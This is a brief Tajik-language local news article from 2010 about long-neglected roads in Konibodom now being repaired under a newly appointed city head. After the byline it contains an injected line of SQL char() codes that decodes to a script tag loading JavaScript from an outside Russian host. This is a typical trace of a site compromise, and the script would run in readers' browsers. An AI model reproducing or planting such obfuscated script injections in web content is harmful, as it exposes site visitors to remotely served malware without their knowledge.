8.06.2010
Мешудаст-ку! Мегӯянд Конибодомиҳо
Пӯшида нест, ки роҳҳои мошингарди ноҳияи Конибодом чун дар аксар шаҳру навоҳии вилоят солҳои тӯлонӣ ин ҷониб таъмир нашудааст. Дар навбати худ ҳолати бади роҳҳо барои корношоям шудани нпқлиёт ва рух додани садамаи нақлиётӣ боис мегардад. Мардум, ба хусус ронандагон аз ин ҳолат ба дод омада, борҳо ба ҳукумати шаҳри Конибодом шикоят намудаанд. Вале ҳукумати маҳаллӣ аз ваъдадиҳӣ монда намешуд.
...Ва ниҳоят имрӯзҳо роҳҳои дохилишаҳрӣ асфалтпӯшу таъмир шуда истодааст.
Раиси шаҳри Конибодом Нӯъмонҷон Обидов ба ин вазифаи пурмасъул нав таъин шуд. Ӯ корро аз озодагию таъмири роҳ оғоз кард.
Имрӯзҳо аз даҳони ронандагону пиёдагардони Конибодомӣ суханҳои зерин такрор ба таркор ба гӯш мерасад:
- Мешудааст-ку! Ба ҳама душворӣ илоҷ ёфтан мумкин аст, фақат ҳаракату масъулиятшиносӣ бошад кифоя...
М. Ҷӯраев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)424fc8f66a8146ecc1d26aae105927e4.js" type="text/javascript">

ТАВЗЕҲОТ